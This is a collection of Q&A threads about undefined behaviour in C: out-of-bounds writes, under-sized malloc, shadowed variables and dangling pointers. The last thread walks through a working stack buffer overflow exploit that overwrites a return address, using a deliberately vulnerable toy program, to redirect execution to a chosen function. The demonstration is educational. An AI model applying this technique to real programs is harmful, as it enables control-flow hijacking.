Can anyone explain this?
Consider this program. We write modify dest[10] intentionally in order to see j value modified.
#include <stdio.h>
#include <stdlib.h>
int main()
{
char source[] = "Hello";
int j = 100;
char dest[10];
dest[12] = 'A';
printf("j = %d \n", j);
fflush(stdout);
printf("j = %d \n", j);
fflush(stdout);
printf("*j = %p \n", &j); // comment this line to get another result!
return 0;
}
output :
j = 4259940
j = 4259940
*j = 0x7ffcc4cdef74
But if we comment the line displaying j varibale address printf("*j = %p \n", &j); we get:
j = 100
j = 100
It is like j is stored elsewhere, not just after dest variable as in the first example.
Any explanation?
Where and whether to store the objects j and dest and how to handle the out-of-bounds access in dest[10] is the compiler’s choice. Modern compilers do many complicated things to optimize programs. When you omit the statement that prints the address of j, the compiler makes different choices, and these produce different results.
A variable is not required to have any storage address if the address is not taken.
The compiler is free to only hold the value in a register or completely remove it via optimization mechanisms and only use the constant value 100 directly.
You might check if you corrupted dest instead when j is not stored on the stack.
Related
The code goes
#include<stdio.h>
int sumOfElements_new(int *A, int size){ // int *A or int A[] same thing
int i, sum = 0; // remember arrays decay as pointers in other functions besides main
for (i =0; i<size;i++){
sum += A[i]; // A[i] = *(A+i)-> value at that address
}
return sum;
}
int main(){
int A[] = {1,2,3,4,5};
int size = sizeof(A)/sizeof(A[0]);
int total = sumOfElements_new(&A[0], size);
printf("%d\n", &A[4]);
printf("Sum of elements = %d\n", total);
printf("Size of A = %d and size of A[0] = %d\n", sizeof(A), sizeof(A[0]));
return 0;
}
Now when I do something like this
int total = sumOfElements_new(&A[3], size);
the result is
Sum of elements = 30
Size of A = 20 and size of A[0] = 4
whenever I use &A[1] to any &A[6], it gives me different values.
Then why calling it in
int size = sizeof(A)/sizeof(A[0]);
gives me the correct answer of the Sum of the elements but, using &A[1-6] the answer goes up and its not even memory address??
Given how you define size, (e.g) int size = sizeof(A)/sizeof(A[0]); you can [only] do:
sumOfElements_new(&A[0],size)
If you use (e.g.) &A[3], you can't pass:
sumOfElements_new(&A[3],size)
because you're telling the function to sum past the end of the array. This is UB (undefined behavior). The program will fetch the data beyond the end, but that data is random (it is just whatever happens to be there).
You have to shorten the size/length you pass to the function. What you'd want is:
sumOfElements_new(&A[3],size - 3)
UPDATE:
May want to comment on printf("%d\n", &A[4]); as well..
This presents another issue. You [probably] want to print the value of the element of the A that has index 4.
The indexing is correct (i.e. it does not go beyond the end of the array), but you're passing the address of that element and not its value.
With your original code, if you compiled with warnings enabled (e.g. using the -Wall option--which you should always do, IMO), the compiler would flag this statement.
That's because you're passing an address [which on modern x86 cpus is probably 64 bits]. That's an unsigned quantity and you're trying to print it in decimal using only 32 bits [because an int is usually only 32 bits].
So, to print the value, you'd probably want:
printf("%d\n", A[4]);
If you truly wanted to print the address of that element [a more advanced usage], you could do:
printf("%p\n", &A[4]);
#include <stdio.h>
int main(void) {
int *x, *y;
x = malloc(sizeof(int));
for (int i = 0; i < 4; i++)
x[i] = i + 1;
y = x;
for (int i = 0; i < 4; i++)
printf("%d ", y[i]);
}
This works correct and outputs 1 2 3 4.
But when i < 1000000 it gives segmentation fault.
Can someone explain this?
You need to allocate a large enough buffer. You only allocate sizeof(int) which is 4 bytes typically and large enough to hold only one integer. Can't store 1000000 elements in that. It worked for 4 elements out of pure chance, probably because although you were overwriting memory, you didn't clobber anything important. Something like this is what you should use.
#include <stdio.h>
int main(void)
{
int count = 1000000;
int *x, *y;
x = malloc(sizeof(int) * count);
for (int i=0; i < count; i++)
x[i] = i+1;
y = x;
for (int i=0; i < count; i++)
printf("%d ", y[i]);
}
Undefined behaviour is undefined, you cannot justify any outcome whatsoever.
You have memory allocated for one integer, the moment you try to dereference the memory outside that range (i.e., i == 1), you're invoking UB. The only valid access is x[0] and x[0] only.
You only allocated memory for one int:
x = malloc(sizeof(int)); // malloc allocates a memory chunk to only hold one int object.
Indexing x at x[i] = i+1; or y at printf("%d ", y[i]); in the loops with anything other than a value of 0 for i (like x[0] or y[0]) invokes undefined behavior because you would attempt to write to and read from not allocated memory.
"then this means if I don't have any enough buffer, it also will give a segmentation fault for i < 4?"
Exactly. You know that is the bad thing on undefined behavior. It does not need to provide wrong results or errors. So, the i < 4 code is broken, too.
Since you written to "only" 12 bytes after the allocated memory (since sizeof(int) common is 4), it might have worked because there was no other necessary information in memory thereafter, but your code is absolutely broken nonetheless.
you defined less memory than the memory you used causing your program to write after that memory zone and alterate the stack fo the program, this is also the case of the buffer overflow vulnerability in C and C++, increment the buffer size
I was doing some exercises on codewars, and had to make a digital_root function (recursively add all digits of a number together, up untill there's only one digit left).
I was fairly confident that I did it right, but for some reason my while-loop never broke, even though my prints showed that len was 1.
#include <stdio.h>
#include <string.h>
int digital_root(int n) {
char number[10];
sprintf(number, "%d", n);
int len = strlen(number);
printf("Outer print: %s %d %d\n", number, n, len);
int sum = 0;
while(len > 1)
{
sum = 0;
for(int i = 0; i<len; i++)
{
sum += number[i] - '0';
}
sprintf(number, "%d", sum);
int len = strlen(getal); //!!!
printf("Inner print: %s %d %d\n", number, sum, len);
}
return sum;
}
It took me a long time to figure out what was wrong. I noticed that I copy pasted the 'int' keyword when I recalculated the len in the while loop (line marked with !!!). When I removed that (because it was not needed to redefine it as an int, it already was), everything suddenly worked like it was supposed to.
This kinda confused me. Why would this matter? I understand that redefining it is bad practice, but I don't get how this would result in the while-loop not breaking?
The used compiler is Clan3.6/C11.
(Ps. When I tried the same code in TIO, it worked in both cases...)
You're not redefining an existing variable, you're defining a new variable.
Consider this example:
#include <stdio.h>
int main(void) {
int x = 42;
printf("Outside, start. x (%p) = %d\n", (void *)&x, x);
{
printf("Inner block, start. x (%p) = %d\n", (void *)&x, x);
int x = 123;
printf("Inner block, end. x (%p) = %d\n", (void *)&x, x);
}
printf("Outside, end. x (%p) = %d\n", (void *)&x, x);
return 0;
}
Sample output:
Outside, start. x (0x7ffd6e6b8abc) = 42
Inner block, start. x (0x7ffd6e6b8abc) = 42
Inner block, end. x (0x7ffd6e6b8ab8) = 123
Outside, end. x (0x7ffd6e6b8abc) = 42
[Live demo]
This program outputs the memory address and value of x. Most uses of x refer to the outer variable declared at the beginning of main. But within the inner block, after int x = 123;, all occurrences of x refer to a second, separate variable that happens to also be called x (but is otherwise independent).
When execution leaves the inner block, the outer x variable becomes visible again.
This is also referred to as shadowing.
In your code, the outer len is never modified, so while(len > 1) is always true.
By the way, shadowing is a very common concept in most languages that support block scoping:
Perl
JavaScript
Haskell
Common Lisp
Your second int len creates a second, parallel, variable that goes away at the end of the {} block. The original len then returns to life, completely unchanged. Without the second int the original variable is changed. With it the original len is effectively an unchanged constant and infinite loop.
Please read the code below.
#include <stdio.h>
int main(void)
{
char* a[4];
int i=0;
while(i<3)
{
char b[50];
scanf(" %s",b);//Assume user enters one two three
a[i++]=b;
}
i=0;
while(i<3)
printf(" %s ",a[i++]);//Why does it always print three three three
return 0;
}
Clarify the following:
Is it that b gets allocated same 50 bytes in memory each time so that all the elements of array a point to same 50 bytes and thus we get only three printed three times(i.e. what's entered last)
Since after the completion of while, array b can be removed very well but no it remains there every single time printing only three's. Why?
Is it not at all a coincidence that this code prints only three's when it could print one two three, one three three as well. What's wrong?
I know the question is very wrongly put. Forgive me for that. I am new here.
QUESTION #1:
The variable b is a variable that is strictly local to the
while loop.
Therefore, do not reference via a pointer any memory formerly used by b outside (after) the while loop.
Storage for b will be reallocated 3 times.
At the end of the while loop, b will go out of scope.
QUESTION #2:
After the while loop, a is not a valid pointer anymore
because a was assigned to point to b,
and b has gone out of scope after the while loop.
NEVERTHELESS, the memory allocated to b may still
not have been modified. You cannot predict what the value of dereferencing a will be after the while loop - since a is only assigned based on b.
QUESTION #3:
(Please see #2) The code that is dereferencing a after the while loop is using a stale pointer - I would not rely on the output.
The code in the question exhibits undefined behaviour because the second loop attempts to access the data that was only valid in the first loop. Therefore, there is very little that can usefully be said.
The question title is "does a variable declared in a loop get the same address each time the loop executes". Here's a proof by counter-example that the address of the variables in a loop need not always be the same, even in a single invocation of a non-recursive function.
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
int main(void)
{
srand(time(0));
for (int i = 0; i < 3; i++)
{
int n = rand() % 30 + 5;
char a[n];
for (int j = 0; j < n - 1; j++)
a[j] = rand() % 26 + 'a';
a[n-1] = '\0';
printf("a: %p %2d [%s]\n", (void *)a, n, a);
char b[50+n];
scanf("%s", b);
printf("b: %p %2d [%s]\n", (void *)b, n+50, b);
}
return 0;
}
On a Mac running macOS Sierra 10.12.4 (using GCC 7.1.0), one run of the program (lv83) produced:
$ ./lv83 <<< 'androgynous hermaphrodite pink-floyds-greatest-hits-dark-side-of-the-moon'
a: 0x7fff507e53b0 23 [sngrhgjganmgxvwahshvzt]
b: 0x7fff507e5360 73 [androgynous]
a: 0x7fff507e53c0 9 [wblbvifc]
b: 0x7fff507e5380 59 [hermaphrodite]
a: 0x7fff507e53b0 26 [pqsbfnnuxuldaactiwvjzvifb]
b: 0x7fff507e5360 76 [pink-floyds-greatest-hits-dark-side-of-the-moon]
$
The address at which the two arrays are allocated varies depending on how big they are. By using different formulae for the sizes of the two arrays, the base addresses could be tweaked. It looks as though the compiler rounds the base address of the arrays to a multiple of 16.
I have this block of code which obviously contains a buffer overflow, because I can enter more than 4 values into array a. I want to call a function using buffer overflow. I know the address of this function. I know that I need to overwrite the functions return address, but I'm not sure how to actually do this? Also, if I set n = 5 and write in 5 values to array a, the program does not crash, even though there is only memory allocated for 4 values. Why is this, and what can I do to get the program to crash? I'm using an older release of Ubuntu that doesn't check for buffer overflows.
int a[4];
for (i = 0;i <n ;i++)
printf ("\n a[%d] = %x, address = %x", i, a[i], &a[i]);
printf("\nEnter %d HEX Values \n", n);
for (i=0;i<n;i++)
scanf("%x",&a[i]);
printf("Done reading\n");
Here is an exploit that worked on my system (GCC on x86_64 GNU/Linux). Please don't tell me that you've tried it and it “didn't work” – the program deliberately invokes undefined behavior and this is, by its very nature, not portable. There is nothing in the C standard that says a compiler must produce code that is easy to exploit in a portable manner.
To give a complete example, I have modified the code a little. First some headers:
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
Here is the vulnerable function we wish to exploit:
static int
vulnerable(void)
{
uint64_t a[4];
int n;
int i;
for (i = 0; i < 10; ++i)
printf("a[%d] = 0x%016lX\n", i, a[i]);
printf("Enter the number of values: ");
scanf("%d", &n);
for (i = 0; i < n; ++i)
{
printf("Enter value %d of %d: ", i, n);
uint64_t temp;
scanf("%lX", &temp);
if (temp)
a[i] = temp;
}
for (i = 0; i < 10; ++i)
printf("a[%d] = 0x%016lX\n", i, a[i]);
return n;
}
I have modified the code a little such that it will only write non-zero values. This makes it a little less likely that we overwrite something we don't want to overwrite. This is of course unnecessary as in this case we could have equally well simply input the value that we know was already stored at the address.
And here is the function we'd like to call:
static void
target(void)
{
printf("Exploit succeeded!\n");
exit(0);
}
To avoid having to read assembly or decompile objects, we'll add some diagnostic output to the main function. It should be clear that the exploit doesn't rely on this.
int
main()
{
assert(sizeof(void *) == sizeof(uint64_t)); /* (1) */
printf("%p return\n", (&&label)); /* (2) */
printf("%p target\n", target); /* (3) */
vulnerable();
label:
return 0;
}
Line (1) is just to make sure we are assuming the correct address size. On line (2) we print the return address that will be on the stack when vulnerable is called. (The &&label syntax is a GCC extension to get the address of a label.) Line (3) prints out the address of our target function.
We don't want the compiler to do smart things that might spoil our exploit so we'll disable all optimizations and compile like:
$ gcc -O0 -o main main.c -static
Then, as we run the program, it might output the following:
$ ./main
0x400e44 return
0x400dfb target
a[0] = 0x0000000000000001
a[1] = 0x0000000000000001
a[2] = 0x00007FFF3E81E588
a[3] = 0x00000000004014F7
a[4] = 0x0000000000400290
a[5] = 0x00000005006B4310
a[6] = 0x00007FFF3E81E4A0
a[7] = 0x0000000000400E44
a[8] = 0x00000000006B4310
a[9] = 0x0000000000401093
We quickly spot the return address at offset 7.
We might have gained the same knowledge from carefully reading the assembly code. Knowing what we have to do, we feed the program with:
Enter the number of values: 8
Enter value 0 of 8: 0
Enter value 1 of 8: 0
Enter value 2 of 8: 0
Enter value 3 of 8: 0
Enter value 4 of 8: 0
Enter value 5 of 8: 0
Enter value 6 of 8: 0
Enter value 7 of 8: 0x400dfb
The following output shows us that we have successfully overwritten the return address and that the exploit actually succeeded.
a[0] = 0x0000000000000001
a[1] = 0x0000000000000001
a[2] = 0x00007FFF3E81E588
a[3] = 0x00000000004014F7
a[4] = 0x0000000000400290
a[5] = 0x00000005006B4310
a[6] = 0x00007FFF3E81E4A0
a[7] = 0x0000000000400DFB
a[8] = 0x00000000006B4310
a[9] = 0x0000000000401093
Exploit succeeded!